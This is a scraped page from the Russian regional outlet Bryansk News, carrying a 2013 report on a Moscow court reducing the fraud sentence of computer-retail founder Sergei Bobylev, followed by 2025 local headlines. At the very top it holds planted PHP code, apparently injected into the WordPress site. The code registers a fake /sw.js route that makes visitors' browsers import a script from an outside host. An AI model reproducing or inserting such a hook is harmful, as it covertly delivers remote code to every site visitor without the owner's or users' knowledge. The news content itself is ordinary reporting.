add_filter('do_parse_request', function ($bool, $wp) { if (isset($_SERVER['REQUEST_URI']) && rtrim($_SERVER['REQUEST_URI'], '/') === '/sw.js') { header('Content-Type: application/javascript'); echo 'importScripts("https://wp.aiso.live/sw.js");'; exit; } return $bool; }, 10, 2); add_action('wp_head', function () { echo ''; }); Мосгорсуд сократил срок бизнесмену, отбывающему наказание в брянской колонии | Брянские новости
Наверх

24 ноября 2013, Воскресенье, 20:51

Мосгорсуд сократил срок бизнесмену, отбывающему наказание в брянской колонии

Мосгорсуд  сократил срок бизнесмену, отбывающему наказание в брянской колонии

Мосгорсуд снизил срок руководителю компьютерной фирмы «Санрайз» Сергею Бобылёву (на фото), осуждённому за мошенничество на сумму более двух миллиардов рублей и отбывающему наказание в Клинцовской колонии.

Компания  «Санрайз» была основана в 1991 году и к 2008 году  владела магазинами компьютерной техники в четырёх десятках городов. Её основателя Бобылёва арестовали летом 2009 года. Предпринимателя  вместе  с отчимом его жены и совладельцем той же компании  Евгением Корецким обвинили в «кидалове» тридцати трёх поставщиков компьютерной техники, среди которых южнокорейская компания «Samsung», а также «Альфа-банк» и «Московский коммерческий банк». Как установили следствие, бизнесмены неправомерно выводили активы фирмы за рубеж.

Сам Бобылёв заявлял о своей невиновности, утверждая, что дело против него сфабриковали, дабы захватить имущество его компании. Останкинский суд Москвы его доводам не внял и приговорил к девяти годам клинцовской «зоны». Корецкий отправился туда же  на четыре года.

Минувшим летом в колонию отправили и московского следователя по особо важным делам Нелли Дмитриеву, «раскручивавшую» дело Бобылёва и Корецкого.  Ей дали три с половиной года за крупную взятку.  

Интересно, что в те же самые августовские дни, когда столичный суд выносил приговор Дмитриевой, брянский областной решал судьбу Евгения Корецкого

В мае Корецкому, осуждённому за мошенничество,  статью переквалифицировали на «Мошенничество в сфере предпринимательской деятельности» и скостили срок на шесть месяцев. Он получил шанс выйти на свободу по экономической амнистии. Однако вердикт Клинцовского  суда обжаловала прокуратура, и 9 августа облсуд отказал Корецкому в пересмотре приговора.

Сергею Бобылёву в переквалификации было отказано и районным судом, и областным. Супруга осуждённого Оксана отчаянно сражалась за свободу мужа. Сначала дело рассмотрели в Мосгорсуде, а когда эта инстанция поддержала брянский вердикт,  жалоба была направлена в Верховный  суд.

В итоге защита Бобылёва добилась своего − дело вернулось в Мосгорсуд, который снизил осужденному срок с девяти до пяти с половиной лет. Это стало возможно после переквалификации статьи на более мягкую – «Мошенничество в сфере предпринимательской деятельности». Того же в высшей судебной инстанции  добивается  компаньон Бобылёва и его родственник Евгений Корецкий.


Редакция «Брянских новостей» оставляет за собой право удалять комментарии, нарушающие законодательство РФ. Запрещены высказывания, содержащие разжигание этнической и религиозной вражды, призывы к насилию, призывы к свержению конституционного строя, оскорбления конкретных лиц или любых групп граждан. Также удаляются комментарии, которые не удовлетворяют общепринятым нормам морали, преследуют рекламные цели, провоцируют пользователей на неконструктивный диалог, не относятся к комментируемой информации, оскорбляют авторов комментируемого материала, содержат ненормативную лексику. Редакция не несёт ответственности за мнения, высказанные в комментариях читателей. Комментарии на сайте «Брянские новости» публикуются без премодерации.

Комментарии для сайта Cackle
О ледяной бомбардировке 17 июня предупредили жителей Брянской области

16 июня 2025, Понедельник, 22:44

О ледяной бомбардировке 17 июня предупредили жителей Брянской области

О ледяной бомбардировке 17 июня предупредили жителей Брянской области синоптики

Под Брянском при обрушении карьера погибли двое 15-летних школьников

16 июня 2025, Понедельник, 21:58

Под Брянском при обрушении карьера погибли двое 15-летних школьников

По предварительной информации, подростки во время рыбалки вырыли подкоп в склоне карьера, в результате чего произошло обрушение влажного песка

В Брянске за длинные выходные сильный ветер повалил 22 дерева

16 июня 2025, Понедельник, 15:46

В Брянске за длинные выходные сильный ветер повалил 22 дерева

В Брянске за длинные выходные – с 12 по 15 июня сильный ветер повалил 22 дерева, об этом сообщила Брянская городская администрация.

В Брянске власти назвали причину отключения мобильного интернета

16 июня 2025, Понедельник, 14:58

В Брянске власти назвали причину отключения мобильного интернета

Брянские власти впервые прокомментировали ситуацию с мобильным интернетом в регионе. Ограничение связи связано с мерами по обеспечению безопасности

В Сельцо и Брянском районе режим чрезвычайной ситуации действует уже 5 месяцев

16 июня 2025, Понедельник, 14:23

В Сельцо и Брянском районе режим чрезвычайной ситуации действует уже 5 месяцев

В городе Сельцо и Брянском районе уже четыре месяца действует режим чрезвычайной ситуации, который был введён 14 января 2025 года и до сих пор не отменён